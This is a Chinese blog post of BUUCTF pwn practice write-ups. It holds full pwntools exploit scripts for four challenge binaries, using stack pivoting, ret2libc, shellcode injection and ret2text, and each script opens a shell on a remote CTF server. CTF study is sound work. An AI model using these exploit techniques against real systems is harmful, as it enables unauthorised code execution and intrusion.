PWN-PRACTICE-BUUCTF-8

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量207 收藏
点赞数
分类专栏: Pwn-BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/119451072
版权

PWN-PRACTICE-BUUCTF-8

ciscn_2019_es_2

栈溢出,但是只能溢出8字节,覆盖ebp和eip,考虑stack pivot,即栈迁移
参考:pwn-ciscn_2019_es_2(栈迁移)

#coding:utf-8
from pwn import *
#context.log_level="debug"
#io=process('./ciscn_2019_es_2')
io=remote('node4.buuoj.cn',25654)
elf=ELF('./ciscn_2019_es_2')
system=elf.plt['system']
leave_ret=0x080485FD
s_ebp_offset=0x38	#输入的起始地址相对于泄露出的ebp的偏移,调试可得
io.recvuntil("your name?\n")
payload="a"*36+"b"*4	#填充满s的40个字节
io.send(payload)
io.recvuntil("b"*4)
ebp=u32(io.recv(4))	#泄露出ebp
print(hex(ebp))
io.recvuntil("\n")
payload="a"*4		#fake ebp
payload+=p32(system)	#第二个leave ret会ret到system
payload+=p32(0xaaaabbbb)#system执行后的返回地址
payload+=p32(ebp-s_ebp_offset+0x10)#system的参数,要指向"/bin/sh\x00"字符串,前面12个字节加上这个的4字节,所以还要加上0x10,仿照格式化字符串任意写的思路
payload+="/bin/sh\x00"
payload=payload.ljust(40,'\x00')#填充满s的40个字节
payload+=p32(ebp-s_ebp_offset)#覆盖ebp,第一个leave的mov esp,ebp(fake) 会让esp指向我们的输入的前四个字节"a"*4
payload+=p32(leave_ret)#覆盖eip,第一个ret会ret到第二个leave ret,而此时的esp为我们输入的前四个字节"a"*4,由于第二个leave的pop ebp,于是我们输入的"a"*4就充当了fake ebp,然后ret就会到system
io.send(payload)
io.interactive()

jarvisoj_level3

栈溢出,ret2libc

from pwn import *
#io=process('./jarvisoj_level3')
io=remote('node4.buuoj.cn',26654)
elf=ELF('./jarvisoj_level3')
libc=ELF('./libc-2.23-x32.so')
io.recvuntil('Input:\n')
write_got=elf.got['write']
write_plt=elf.plt['write']
main_addr=elf.sym['main']
payload='a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(10)
io.sendline(payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))
libc_base=write_addr-libc.sym['write']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
io.recvuntil('Input:\n')
payload='a'*(0x88+4)+p32(system)+p32(0xdead)+p32(binsh)
io.sendline(payload)
io.interactive()

ez_pz_hackover_2016

'\x00’绕过strcmp,然后是栈溢出,ret2shellcode
参考:[BUUCTF]PWN——ez_pz_hackover_2016
我自己做的时候,想当然的以为想要构成栈溢出,要填充的数据量为ida分析出的dest的50个字节
实际上需要调试才能得到填充量应为0x16(带"crashme\x00",不带ebp)
覆盖ebp和eip,最后加上shellcode,覆盖eip应指向shellcode
所以shellcode相对于题目直接给出的s的地址的偏移也需要知道
eip处偏移为32,因为eip要指向shellcode,而shellcode跟在eip后面
所以shellcode偏移为32-4==28

from pwn import *
#context.log_level="debug"
context.os="linux"
context.arch="i386"
#io=process("./ez_pz_hackover_2016")
io=remote('node4.buuoj.cn',25710)
elf=ELF("./ez_pz_hackover_2016")
io.recvuntil("lets crash: ")
s_stack=int(io.recvuntil("\n")[:-1],16)
print(hex(s_stack))
io.recvuntil("> ")
payload="crashme\x00"#'\x00'绕过strcmp
payload+="a"*(0x16-8+4)#覆盖ebp
payload+=p32(s_stack-32+4)#覆盖eip指向shellcode
payload+=asm(shellcraft.sh())#shellcode
io.sendline(payload)
io.interactive()

jarvisoj_tell_me_something

栈溢出,ret2text

from pwn import *
#io=process('./jarvisoj_tell_me_something')
io=remote('node4.buuoj.cn',29268)
elf=ELF('./jarvisoj_tell_me_something')
flag_addr=elf.sym['good_game']
io.recvuntil('message:\n')
payload='a'*(0x88)+p64(flag_addr)
io.send(payload)
io.interactive()
P1umH0
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 936
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 440
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 520
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 293
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3230
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2092
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 281
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 247
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1156
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 244
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 561
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2030
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 678
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 616
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF-pwn]——pwnable_orw   (ORW)
Y_peak的博客
03-16 1211
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值